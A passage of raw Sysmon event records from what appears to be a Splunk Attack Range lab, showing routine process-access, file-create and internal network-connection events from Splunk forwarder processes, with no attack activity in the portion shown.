Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E991DFF26EE4462BE535AAE5F6558227,SHA256=A1DA12370E59C72691A95FAA5FB6AC52CD50E9E4DF2551835E88DCAD10EFBB1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-179F-6216-1205-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-179F-6216-1205-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.479{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-179F-6216-1205-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.480{4F8D34B0-179F-6216-1205-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000221380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.231{4F8D34B0-179E-6216-1105-000000003902}27403332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:48.979{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5056F0F2C87897CE36DF0B7C0B7340D2,SHA256=43D5CF17BBF4B58F093CB514A1F3C361C0EE3327F88880AF65F67381C872EA29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:48.137{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C66C8D020181ED562775B1DAA587B5,SHA256=3D684DE818200A1DD4BC899F2CF2E80AC733DBE9CCCF29F9A08D22703D0F73E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.007{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51647-false10.0.1.12-8089- 354300x8000000000000000297548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:47.548{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49457-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:49.154{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F743A8E7D08C618EF679546E6767EBE5,SHA256=434A9DD19BA5F4C2DB73DA9A280635E20032AD671111E669FE128FF81A49AF60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17A1-6216-1405-000000003902}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 